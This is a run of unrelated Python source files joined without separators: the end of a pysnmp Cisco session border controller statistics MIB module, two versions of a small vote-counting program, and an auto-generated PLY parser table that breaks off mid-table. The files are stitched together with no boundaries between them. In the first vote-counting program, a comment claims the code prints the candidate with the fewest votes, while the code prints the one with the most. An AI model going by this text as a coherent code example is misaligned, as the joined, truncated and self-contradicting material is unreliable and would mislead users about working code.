('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp6xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp6xxOut')) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csb_sip_mthd_history_stats_group = csbSIPMthdHistoryStatsGroup.setStatus('current') csb_sip_mthd_rc_current_stats_group = object_group((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 5)).setObjects(('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCCurrentStatsAdjName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCCurrentStatsMethodName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCCurrentStatsRespIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCCurrentStatsRespOut')) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csb_sip_mthd_rc_current_stats_group = csbSIPMthdRCCurrentStatsGroup.setStatus('current') csb_sip_mthd_rc_history_stats_group = object_group((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 6)).setObjects(('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCHistoryStatsAdjName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCHistoryStatsMethodName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCHistoryStatsRespIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCHistoryStatsRespOut')) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csb_sip_mthd_rc_history_stats_group = csbSIPMthdRCHistoryStatsGroup.setStatus('current') mibBuilder.exportSymbols('CISCO-SESS-BORDER-CTRLR-STATS-MIB', csbRfBillRealmStatsSuccStartAcrs=csbRfBillRealmStatsSuccStartAcrs, csbRadiusStatsMalformedRsps=csbRadiusStatsMalformedRsps, PYSNMP_MODULE_ID=ciscoSbcStatsMIB, csbSIPMthdCurrentStatsResp1xxIn=csbSIPMthdCurrentStatsResp1xxIn, csbSIPMthdCurrentStatsResp4xxIn=csbSIPMthdCurrentStatsResp4xxIn, csbSIPMthdRCCurrentStatsEntry=csbSIPMthdRCCurrentStatsEntry, csbRfBillRealmStatsTable=csbRfBillRealmStatsTable, csbSIPMthdCurrentStatsResp3xxIn=csbSIPMthdCurrentStatsResp3xxIn, csbSIPMthdRCCurrentStatsMethodName=csbSIPMthdRCCurrentStatsMethodName, csbSIPMthdHistoryStatsReqOut=csbSIPMthdHistoryStatsReqOut, csbSIPMthdRCCurrentStatsAdjName=csbSIPMthdRCCurrentStatsAdjName, csbRadiusStatsActRsps=csbRadiusStatsActRsps, csbSIPMthdCurrentStatsResp3xxOut=csbSIPMthdCurrentStatsResp3xxOut, csbSIPMthdRCCurrentStatsRespOut=csbSIPMthdRCCurrentStatsRespOut, csbRadiusStatsEntry=csbRadiusStatsEntry, csbRfBillRealmStatsGroup=csbRfBillRealmStatsGroup, csbSIPMthdHistoryStatsReqIn=csbSIPMthdHistoryStatsReqIn, csbRadiusStatsActRetrans=csbRadiusStatsActRetrans, csbRadiusStatsClientType=csbRadiusStatsClientType, csbRadiusStatsAcsChalls=csbRadiusStatsAcsChalls, ciscoSbcStatsMIBNotifs=ciscoSbcStatsMIBNotifs, csbSIPMthdRCCurrentStatsTable=csbSIPMthdRCCurrentStatsTable, csbStatsMIBGroups=csbStatsMIBGroups, csbRfBillRealmStatsTotalStopAcrs=csbRfBillRealmStatsTotalStopAcrs, csbSIPMthdCurrentStatsResp4xxOut=csbSIPMthdCurrentStatsResp4xxOut, csbSIPMthdHistoryStatsResp6xxOut=csbSIPMthdHistoryStatsResp6xxOut, csbSIPMthdHistoryStatsGroup=csbSIPMthdHistoryStatsGroup, csbSIPMthdCurrentStatsAdjName=csbSIPMthdCurrentStatsAdjName, csbRadiusStatsAcsRejects=csbRadiusStatsAcsRejects, csbSIPMthdHistoryStatsResp2xxIn=csbSIPMthdHistoryStatsResp2xxIn, csbSIPMthdHistoryStatsResp3xxIn=csbSIPMthdHistoryStatsResp3xxIn, csbRadiusStatsAcsReqs=csbRadiusStatsAcsReqs, csbRadiusStatsBadAuths=csbRadiusStatsBadAuths, csbStatsMIBCompliances=csbStatsMIBCompliances, csbSIPMthdHistoryStatsMethodName=csbSIPMthdHistoryStatsMethodName, csbSIPMthdRCHistoryStatsGroup=csbSIPMthdRCHistoryStatsGroup, csbSIPMthdCurrentStatsReqOut=csbSIPMthdCurrentStatsReqOut, csbSIPMthdRCHistoryStatsInterval=csbSIPMthdRCHistoryStatsInterval, csbRadiusStatsTimeouts=csbRadiusStatsTimeouts, CiscoSbcRadiusClientType=CiscoSbcRadiusClientType, csbSIPMthdRCHistoryStatsAdjName=csbSIPMthdRCHistoryStatsAdjName, csbSIPMthdRCHistoryStatsRespOut=csbSIPMthdRCHistoryStatsRespOut, csbSIPMthdCurrentStatsResp1xxOut=csbSIPMthdCurrentStatsResp1xxOut, csbSIPMthdCurrentStatsMethodName=csbSIPMthdCurrentStatsMethodName, csbRadiusStatsAcsAccpts=csbRadiusStatsAcsAccpts, CiscoSbcSIPMethod=CiscoSbcSIPMethod, csbRadiusStatsDropped=csbRadiusStatsDropped, csbRadiusStatsEntIndex=csbRadiusStatsEntIndex, csbRfBillRealmStatsSuccEventAcrs=csbRfBillRealmStatsSuccEventAcrs, csbRfBillRealmStatsSuccStopAcrs=csbRfBillRealmStatsSuccStopAcrs, csbSIPMthdHistoryStatsResp1xxIn=csbSIPMthdHistoryStatsResp1xxIn, csbRfBillRealmStatsFailStartAcrs=csbRfBillRealmStatsFailStartAcrs, csbSIPMthdRCHistoryStatsMethodName=csbSIPMthdRCHistoryStatsMethodName, csbSIPMthdRCCurrentStatsGroup=csbSIPMthdRCCurrentStatsGroup, csbSIPMthdRCHistoryStatsTable=csbSIPMthdRCHistoryStatsTable, csbSIPMthdRCCurrentStatsMethod=csbSIPMthdRCCurrentStatsMethod, csbSIPMthdHistoryStatsResp5xxIn=csbSIPMthdHistoryStatsResp5xxIn, csbSIPMthdHistoryStatsResp1xxOut=csbSIPMthdHistoryStatsResp1xxOut, csbRfBillRealmStatsRealmName=csbRfBillRealmStatsRealmName, ciscoSbcStatsMIBObjects=ciscoSbcStatsMIBObjects, csbRadiusStatsClientName=csbRadiusStatsClientName, csbSIPMthdHistoryStatsAdjName=csbSIPMthdHistoryStatsAdjName, csbSIPMthdRCHistoryStatsEntry=csbSIPMthdRCHistoryStatsEntry, csbRfBillRealmStatsTotalStartAcrs=csbRfBillRealmStatsTotalStartAcrs, csbSIPMthdHistoryStatsResp5xxOut=csbSIPMthdHistoryStatsResp5xxOut, csbSIPMthdHistoryStatsInterval=csbSIPMthdHistoryStatsInterval, csbSIPMthdHistoryStatsMethod=csbSIPMthdHistoryStatsMethod, csbSIPMthdCurrentStatsGroup=csbSIPMthdCurrentStatsGroup, csbSIPMthdCurrentStatsResp6xxIn=csbSIPMthdCurrentStatsResp6xxIn, csbRfBillRealmStatsFailInterimAcrs=csbRfBillRealmStatsFailInterimAcrs, csbSIPMthdRCCurrentStatsInterval=csbSIPMthdRCCurrentStatsInterval, csbSIPMthdHistoryStatsResp2xxOut=csbSIPMthdHistoryStatsResp2xxOut, csbSIPMthdCurrentStatsResp2xxOut=csbSIPMthdCurrentStatsResp2xxOut, csbRadiusStatsUnknownType=csbRadiusStatsUnknownType, csbRfBillRealmStatsTotalEventAcrs=csbRfBillRealmStatsTotalEventAcrs, csbSIPMthdHistoryStatsTable=csbSIPMthdHistoryStatsTable, csbSIPMthdCurrentStatsEntry=csbSIPMthdCurrentStatsEntry, csbSIPMthdCurrentStatsMethod=csbSIPMthdCurrentStatsMethod, ciscoSbcStatsMIBConform=ciscoSbcStatsMIBConform, csbSIPMthdRCCurrentStatsRespCode=csbSIPMthdRCCurrentStatsRespCode, csbSIPMthdCurrentStatsTable=csbSIPMthdCurrentStatsTable, csbRfBillRealmStatsSuccInterimAcrs=csbRfBillRealmStatsSuccInterimAcrs, csbRadiusStatsSrvrName=csbRadiusStatsSrvrName, csbRadiusStatsAcsRtrns=csbRadiusStatsAcsRtrns, csbRfBillRealmStatsFailEventAcrs=csbRfBillRealmStatsFailEventAcrs, csbRfBillRealmStatsEntry=csbRfBillRealmStatsEntry, csbRfBillRealmStatsFailStopAcrs=csbRfBillRealmStatsFailStopAcrs, csbStatsMIBCompliance=csbStatsMIBCompliance, csbSIPMthdHistoryStatsResp4xxIn=csbSIPMthdHistoryStatsResp4xxIn, csbSIPMthdCurrentStatsResp5xxOut=csbSIPMthdCurrentStatsResp5xxOut, csbRadiusStatsPending=csbRadiusStatsPending, csbSIPMthdCurrentStatsInterval=csbSIPMthdCurrentStatsInterval, csbSIPMthdRCHistoryStatsRespCode=csbSIPMthdRCHistoryStatsRespCode, csbRfBillRealmStatsIndex=csbRfBillRealmStatsIndex, csbRadiusStatsTable=csbRadiusStatsTable, ciscoSbcStatsMIB=ciscoSbcStatsMIB, csbSIPMthdHistoryStatsEntry=csbSIPMthdHistoryStatsEntry, csbRadiusStatsActReqs=csbRadiusStatsActReqs, csbSIPMthdRCCurrentStatsRespIn=csbSIPMthdRCCurrentStatsRespIn, csbSIPMthdHistoryStatsResp3xxOut=csbSIPMthdHistoryStatsResp3xxOut, csbSIPMthdCurrentStatsReqIn=csbSIPMthdCurrentStatsReqIn, csbSIPMthdRCHistoryStatsRespIn=csbSIPMthdRCHistoryStatsRespIn, csbSIPMthdRCHistoryStatsMethod=csbSIPMthdRCHistoryStatsMethod, csbSIPMthdCurrentStatsResp5xxIn=csbSIPMthdCurrentStatsResp5xxIn, csbSIPMthdCurrentStatsResp2xxIn=csbSIPMthdCurrentStatsResp2xxIn, csbSIPMthdCurrentStatsResp6xxOut=csbSIPMthdCurrentStatsResp6xxOut, csbSIPMthdHistoryStatsResp6xxIn=csbSIPMthdHistoryStatsResp6xxIn, csbRadiusStatsGroup=csbRadiusStatsGroup, csbRfBillRealmStatsTotalInterimAcrs=csbRfBillRealmStatsTotalInterimAcrs, csbSIPMthdHistoryStatsResp4xxOut=csbSIPMthdHistoryStatsResp4xxOut)
def main(): cases = int(input()) for _ in range(cases): candidates = int(input()) votes = [] for _ in range(candidates): votes.append(int(input())) # if majority is found, print the candidate if (max(votes) > sum(votes) / 2): print(f"majority winner {votes.index(max(votes)) + 1}") # if no majority, print the candidate with the fewest votes # 1 winner elif (votes.count(max(votes)) == 1): print(f"minority winner {votes.index(max(votes)) + 1}") # more than 1 winner else: print("no winner") if __name__ == "__main__": main()
def main(): cases = int(input()) for _ in range(cases): candidates = int(input()) votes = [] for _ in range(candidates): votes.append(int(input())) if max(votes) > sum(votes) / 2: print(f'majority winner {votes.index(max(votes)) + 1}') elif votes.count(max(votes)) == 1: print(f'minority winner {votes.index(max(votes)) + 1}') else: print('no winner') if __name__ == '__main__': main()
# Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # parsetab.py # This file is automatically generated. Do not edit. _tabversion = '3.8' _lr_method = 'LALR' _lr_signature = 'm%\x1f\x13\xa8{\x7f\xb1\x0f\xb4\x8fr\x0cc\x8b\x0e' _lr_action_items = {'[':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,66,66,66,66,66,-63,66,-48,66,-58,66,66,66,-14,-15,66,66,66,66,66,66,66,66,66,66,66,66,66,-3,66,66,66,66,66,66,66,66,66,66,66,66,-16,-71,66,66,66,66,-72,-65,-60,-62,-64,-61,]),'WHILE':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,]),'AND':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,51,-19,-18,-17,51,-63,51,-48,51,-58,51,-25,51,-14,-15,51,-29,-27,-28,-30,-22,-36,-41,51,-26,-42,51,-38,-3,-40,-37,51,-39,-23,-24,51,51,51,-32,-31,51,-16,-71,51,51,51,51,-72,-65,-60,-62,-64,-61,]),'EQ_ASSIGN':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,74,78,80,81,83,84,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,54,-19,-18,-17,-21,-63,-20,-48,118,-58,-25,-33,124,125,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,-44,-38,-3,-40,-37,-46,-39,-23,-24,-43,-45,-47,-32,-31,-34,-16,-71,-72,-65,-60,-62,-64,-61,]),'FUNCTION':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,]),'BREAK':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,]),'IF':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,]),'CR':([1,7,9,10,11,15,16,17,19,20,22,23,26,28,29,31,37,69,70,71,72,78,80,81,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,139,141,142,143,146,147,],[11,11,-12,-10,11,11,-11,-13,-14,-15,-2,70,-19,-18,-17,-21,-63,11,11,-20,-48,-58,-25,-33,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,-44,-38,-3,-40,-37,-46,-39,-23,-24,-43,-45,-47,-32,-31,-34,-16,-71,-72,-65,-60,-62,-64,-61,]),'NEXT':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,]),'OR':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,62,-19,-18,-17,62,-63,62,-48,62,-58,62,-25,62,-14,-15,62,-29,-27,-28,-30,-22,-36,-41,62,-26,-42,62,-38,-3,-40,-37,62,-39,-23,-24,-43,62,62,-32,-31,62,-16,-71,62,62,62,62,-72,-65,-60,-62,-64,-61,]),'IN':([73,],[117,]),'GE':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,55,55,-18,-17,55,-63,55,-48,55,-58,55,-25,55,-14,-15,55,-29,-27,-28,-30,-22,-36,-41,55,-26,55,55,-38,-3,-40,-37,55,-39,-23,-24,55,55,55,-32,-31,55,-16,-71,55,55,55,55,-72,-65,-60,-62,-64,-61,]),'ELSE':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,78,80,81,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,-2,-19,-18,-17,-21,-63,-20,-48,-58,-25,-33,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,-44,-38,-3,-40,-37,-46,-39,-23,-24,-43,-45,-47,-32,-31,-34,-16,-71,-72,-65,145,-62,-64,-61,]),'-':([1,3,4,5,6,7,8,9,10,11,15,16,17,18,19,20,22,25,26,28,29,31,35,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,77,78,79,80,81,82,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,117,118,124,125,126,127,129,130,131,133,134,135,136,137,139,141,142,143,144,145,146,147,],[6,6,6,6,6,6,6,-12,-10,6,6,-11,-13,6,-14,-15,44,6,44,-18,-17,44,6,-63,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,44,-48,44,-58,44,-25,44,6,-14,-15,44,-29,-27,-28,-30,-22,44,44,44,-26,44,44,44,-3,44,44,44,44,-23,-24,44,44,44,-32,-31,44,6,6,6,6,6,-16,-71,44,44,6,6,6,44,44,-72,-65,-60,-62,6,6,-64,-61,]),',':([9,10,16,17,19,20,22,26,28,29,31,37,41,56,66,71,72,74,75,78,80,81,82,83,84,85,86,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,124,125,126,127,129,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,-2,-19,-18,-17,-21,-63,82,82,82,-20,-48,-69,119,-58,-25,-33,82,-14,-15,-53,126,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,-44,-38,-3,-40,-37,-46,-39,-23,-24,-43,-45,-47,-32,-31,-34,-56,-54,82,-16,-71,-70,-57,-55,-72,-65,-60,-62,-64,-61,]),'/':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,45,45,-18,-17,45,-63,45,-48,45,-58,45,-25,45,-14,-15,45,-29,45,45,-30,-22,45,45,45,-26,45,45,45,-3,45,45,45,45,-23,-24,45,45,45,-32,-31,45,-16,-71,45,45,45,45,-72,-65,-60,-62,-64,-61,]),'LE':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,57,57,-18,-17,57,-63,57,-48,57,-58,57,-25,57,-14,-15,57,-29,-27,-28,-30,-22,-36,-41,57,-26,57,57,-38,-3,-40,-37,57,-39,-23,-24,57,57,57,-32,-31,57,-16,-71,57,57,57,57,-72,-65,-60,-62,-64,-61,]),')':([9,10,16,17,19,20,22,26,27,28,29,31,34,37,41,71,72,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,119,120,121,122,123,124,125,126,127,129,130,131,132,136,137,138,139,140,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,-2,-19,72,-18,-17,-21,-66,-63,-49,-20,-48,-69,-67,-59,-59,-58,-59,-25,-33,-49,-14,-15,-53,-50,127,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,-44,-38,-3,-40,-37,-46,-39,-23,-24,-43,-45,-47,-32,-31,-34,-66,133,134,135,-51,-56,-54,-49,-16,-71,-59,-70,-68,-57,-55,-52,-72,144,-65,-60,-62,-64,-61,]),'(':([1,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,25,26,28,29,31,35,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,77,78,79,80,81,82,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,117,118,124,125,126,127,129,130,131,133,134,135,136,137,139,141,142,143,144,145,146,147,],[4,4,4,4,4,4,4,-12,-10,4,33,34,35,4,-11,-13,4,-14,-15,38,41,4,41,41,41,41,4,-63,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,41,-48,41,-58,41,41,41,4,-14,-15,41,41,41,41,41,41,41,41,41,41,41,41,41,-3,41,41,41,41,41,41,41,41,41,41,41,41,4,4,4,4,4,-16,-71,41,41,4,4,4,41,41,-72,-65,-60,-62,4,4,-64,-61,]),'+':([1,3,4,5,6,7,8,9,10,11,15,16,17,18,19,20,22,25,26,28,29,31,35,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,77,78,79,80,81,82,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,117,118,124,125,126,127,129,130,131,133,134,135,136,137,139,141,142,143,144,145,146,147,],[5,5,5,5,5,5,5,-12,-10,5,5,-11,-13,5,-14,-15,43,5,43,-18,-17,43,5,-63,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,43,-48,43,-58,43,-25,43,5,-14,-15,43,-29,-27,-28,-30,-22,43,43,43,-26,43,43,43,-3,43,43,43,43,-23,-24,43,43,43,-32,-31,43,5,5,5,5,5,-16,-71,43,43,5,5,5,43,43,-72,-65,-60,-62,5,5,-64,-61,]),'*':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,42,42,-18,-17,42,-63,42,-48,42,-58,42,-25,42,-14,-15,42,-29,42,42,-30,-22,42,42,42,-26,42,42,42,-3,42,42,42,42,-23,-24,42,42,42,-32,-31,42,-16,-71,42,42,42,42,-72,-65,-60,-62,-64,-61,]),'%':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,40,-19,-18,-17,-21,-63,-20,-48,40,-58,40,-25,40,-14,-15,40,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,40,-38,-3,-40,-37,-46,-39,-23,-24,-43,40,-47,-32,-31,-34,-16,-71,40,40,40,40,-72,-65,-60,-62,-64,-61,]),'$':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,39,39,39,39,39,-63,39,-48,39,-58,39,-25,39,-14,-15,39,39,39,39,39,39,39,39,39,-26,39,39,39,-3,39,39,39,39,-23,-24,39,39,39,39,39,39,-16,-71,39,39,39,39,-72,-65,-60,-62,-64,-61,]),'!':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,]),'NE':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,59,59,-18,-17,59,-63,59,-48,59,-58,59,-25,59,-14,-15,59,-29,-27,-28,-30,-22,-36,-41,59,-26,59,59,-38,-3,-40,-37,59,-39,-23,-24,59,59,59,-32,-31,59,-16,-71,59,59,59,59,-72,-65,-60,-62,-64,-61,]),'<':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,47,47,-18,-17,47,-63,47,-48,47,-58,47,-25,47,-14,-15,47,-29,-27,-28,-30,-22,-36,-41,47,-26,47,47,-38,-3,-40,-37,47,-39,-23,-24,47,47,47,-32,-31,47,-16,-71,47,47,47,47,-72,-65,-60,-62,-64,-61,]),'?':([1,3,4,5,6,7,8,9,10,11,15,16,17,18,19,20,22,25,26,28,29,31,35,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,77,78,79,80,81,82,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,117,118,124,125,126,127,129,130,131,133,134,135,136,137,139,141,142,143,144,145,146,147,],[8,8,8,8,8,8,8,-12,-10,8,8,-11,-13,8,-14,-15,49,8,-19,-18,-17,-21,8,-63,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,-20,-48,49,-58,49,-25,49,8,-14,-15,49,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,49,-38,-3,-40,-37,-46,-39,-23,-24,-43,49,-47,-32,-31,-34,8,8,8,8,8,-16,-71,49,49,8,8,8,49,49,-72,-65,-60,-62,8,8,-64,-61,]),'>':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,48,48,-18,-17,48,-63,48,-48,48,-58,48,-25,48,-14,-15,48,-29,-27,-28,-30,-22,-36,-41,48,-26,48,48,-38,-3,-40,-37,48,-39,-23,-24,48,48,48,-32,-31,48,-16,-71,48,48,48,48,-72,-65,-60,-62,-64,-61,]),'SYMBOL':([1,3,4,5,6,7,8,11,15,18,25,33,34,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,119,124,125,126,133,134,135,144,145,],[20,20,20,20,20,20,20,20,20,20,20,73,74,20,20,20,20,84,20,20,20,20,20,20,20,20,20,20,20,20,20,20,84,20,20,20,20,20,20,20,20,20,84,20,20,20,20,84,20,20,74,20,20,84,20,20,20,20,20,]),':':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,46,46,-18,-17,46,-63,46,-48,46,-58,46,-25,46,-14,-15,46,46,46,46,46,-22,46,46,46,-26,46,46,46,-3,46,46,46,46,-23,-24,46,46,46,46,-31,46,-16,-71,46,46,46,46,-72,-65,-60,-62,-64,-61,]),'NUM_CONST':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17